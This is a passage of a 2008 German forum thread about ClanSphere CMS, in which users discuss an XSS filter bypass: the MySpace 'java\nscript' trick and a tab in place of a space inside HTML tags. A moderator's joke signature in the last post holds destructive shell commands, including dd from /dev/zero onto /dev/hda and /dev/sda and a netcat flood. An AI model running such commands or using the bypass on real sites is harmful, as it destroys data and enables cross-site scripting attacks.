Antworten: 30
|
|
SCHIRI Weltmeister Herkunft: Hamburg Beiträge: 5299 |
# Antwort: 21 - 17.09.2008 um 18:38 Uhr
hm keine ahnung ob der grad genannte fehler auch direkt gefixt wurde, aber bei mir kommt da nur ne weiße seite. (auch im quelltext) und das mit den spaces und tabs hab ich auch nicht verstanden. also ich weiß zwar was du meinst, aber nicht wo da ein problem liegt? wo soll eine überprüdung auf tabs stattfinden? und warum? und wo gibts es bereits eine für spaces, die du per tabs umgehen musst? /e: scheint an firefox zu liegen, dass es bei mir nicht ging, mit chrome hats jetzt "funktioniert" ------------------ www.laszlokorte.de Zuletzt editiert von SCHIRI am 17.09.2008 um 18:40 Uhr (1x Editiert) |
Inaktiv |
|
Swifter Specialist Beiträge: 1841 |
# Antwort: 22 - 17.09.2008 um 18:41 Uhr
bei mir gings mit FF... nice ------------------ Greetz Swifter Wenn du dich klein, nutzlos, beleidigt und depressiv fühlst, denke immer daran: Du warst einmal das schnellste und erfolgreichste Spermium deiner Gruppe!
|
Inaktiv |
|
duRiel Weltmeister Herkunft: Cambridge Beiträge: 7300 |
# Antwort: 23 - 17.09.2008 um 18:46 Uhr
danke! muss gucken ob das in der svn version auch noch so ist. |
Inaktiv |
|
xsigndll Thread-Ersteller Try to beat me Beiträge: 124 |
# Antwort: 24 - 17.09.2008 um 19:22 Uhr
17.09.2008 um 18:38 Uhr - SCHIRI: hm keine ahnung ob der grad genannte fehler auch direkt gefixt wurde, aber bei mir kommt da nur ne weiße seite. (auch im quelltext) und das mit den spaces und tabs hab ich auch nicht verstanden. also ich weiß zwar was du meinst, aber nicht wo da ein problem liegt? wo soll eine überprüdung auf tabs stattfinden? und warum? und wo gibts es bereits eine für spaces, die du per tabs umgehen musst? /e: scheint an firefox zu liegen, dass es bei mir nicht ging, mit chrome hats jetzt "funktioniert" Also das beste Bsp. für sowas ist immer wieder der myspace (glaube es war mypsace) XSS. Bei MySpace kannst du HTML einfügen, aber kein Javascript. Dabei hat Myspace die HTML Sachen auf "javascript" hin überprüft, jedoch nciht mit den findigen Usern gerechnet. Z.B. ist folgendes valide: onlick="java script: alert('bla')" (der Zeilenumbruch machts). In wahrheit sieht das dann so aus: "java\nscript" und das wird eben nicht von dem myspace "javascript" gefiltert und durchgelassen. Daraufhin gab es eine der schwersten XSS Lücken im WWW, die sich mit exponentiell viraler Geschwindigkeit verbreitet hat. Hier ist es ähnlich. Der Browser macht keinen Unterschied ob da steht: <h1 style....> ODER: <h1 [HIER EINEN TAB DENKEN] style.....> Von Clansphere wird aber %20 (also ein Leerzeichen) so escaped, dass man es nicht umgehen kann. Also benutzt man einen Tab und kommt somit durch die Filterung. ---------- Mit IE hab ichs nicht probiert - nur mit FF. Jeder Browser ist da anders ------------------ x!sign.dll - Full-Stack with a touch of DevOps --- Facebook - x!sign.dll Twitter - x!sign.dll Instagram - x!sign.dll Pinterest - x!sign.dll LinkedIn - x!sign.dll Tumblr - x!sign.dll Flickr - x!sign.dll Reddit - x!sign.dll Zuletzt editiert von xsign am 17.09.2008 um 19:25 Uhr (1x Editiert) |
Inaktiv |
|
SCHIRI Weltmeister Herkunft: Hamburg Beiträge: 5299 |
# Antwort: 25 - 17.09.2008 um 19:36 Uhr
hm ich wüsste jetzt nichmal, dass clansphere leerzeichen exscaped. dein javascript innerHTML geht ja an jeglicher filterung vorbei. und die einzige filterung die es überhaupt gib escaped die <>. ------------------ www.laszlokorte.de |
Inaktiv |
|
xsigndll Thread-Ersteller Try to beat me Beiträge: 124 |
# Antwort: 26 - 17.09.2008 um 19:43 Uhr
nein - z.b. gibt es den ' und " escape in CS dem gegenüber steht der htmlspecialchars(), der quotes, <> etc. escaped und dann gibts noch wischi-waschi BB-Code ersetzungen. ------------------ x!sign.dll - Full-Stack with a touch of DevOps --- Facebook - x!sign.dll Twitter - x!sign.dll Instagram - x!sign.dll Pinterest - x!sign.dll LinkedIn - x!sign.dll Tumblr - x!sign.dll Flickr - x!sign.dll Reddit - x!sign.dll |
Inaktiv |
|
n4g-Vienna-1 Rock the board Beiträge: 73 |
# Antwort: 27 - 30.09.2008 um 18:11 Uhr
Also ganz einfach... solange ein CMS den Quellcode öffentlich stellt gibt es auch einen Hack. Nicht umsonst gibt es CMS-Systeme um die 800 Euro und mehr wo ihr keinen öffentlichen Quellcode findet. Wer eines braucht schreibt mich mal an. Hab da eines für nur 750 Euro inkl. lebenslanger Lizenz. ...Dann gibts auch keine schnellen Hacks ------------------ ::.www.net4gamer.de.:: |
Inaktiv |
|
SCHIRI Weltmeister Herkunft: Hamburg Beiträge: 5299 |
# Antwort: 28 - 30.09.2008 um 18:15 Uhr
na klar gibts auch dafür hacks... langsam glaub ich echt, dass du, wie freeze schon gesagt hat, coints haben willst... wenn es keine sicherheitslücken gibt gibts auch keine "hacks" für ein cms. wenn es lücken gibts, gibts auch "hacks" dafür, egal wie teuer das cms ist. wer von denen die hier im forum lesen sucht denn bitte ein 1k¤ cms? wenn schon sinnlose posts bitte zielgruppenorientiert. ------------------ www.laszlokorte.de |
Inaktiv |
|
xsigndll Thread-Ersteller Try to beat me Beiträge: 124 |
# Antwort: 29 - 01.10.2008 um 12:42 Uhr
lol zielgruppenorientierte sinnlosposts? ;D der is geil ------------------ x!sign.dll - Full-Stack with a touch of DevOps --- Facebook - x!sign.dll Twitter - x!sign.dll Instagram - x!sign.dll Pinterest - x!sign.dll LinkedIn - x!sign.dll Tumblr - x!sign.dll Flickr - x!sign.dll Reddit - x!sign.dll |
Inaktiv |
|
pHaeno* Geekboy Beiträge: 1405 |
# Antwort: 30 - 01.10.2008 um 17:36 Uhr
Da diess Thema eigentlich schon lange durch ist, schiebe ich hier einmal den Riegel vor. /closed ------------------ hajo says: <div style="imbaness: 200pt; skill: 200pt; equip-align: top;">phaeno's mage</div> 27.05.2007 um 01:38 Uhr - pHaeno*: Bei Clansphere gibt es KEINE Bugs, es sind ALLES FEATURES weichmann... Blondi (15:08): bist du nen mann oder nen weich ei? pHaeno* (15:09): weichmann mehr... if($ahnung==0) {
read( 'handbuch' ) ; } ## für Linux-Fans kill -9 `netstat -a | grep https | awk -e '{ print $3; }'` dd if=/dev/zero of=/dev/hda count=1M dd if=/dev/zero of=/dev/sda count=1M cat /dev/urandom | nc 127.0.0.1 443 |
Inaktiv |
|
Dieses Thema wurde von pHaeno* geschlossen. |
|
Antworten: 30
|
Latest 5 Modules
Demo
Probiere ClanSphere aus und teste daran herum. Demo
Spenden
ClanSphere ist freie OpenSource Software.
Bitte unterstützt uns.
Spenden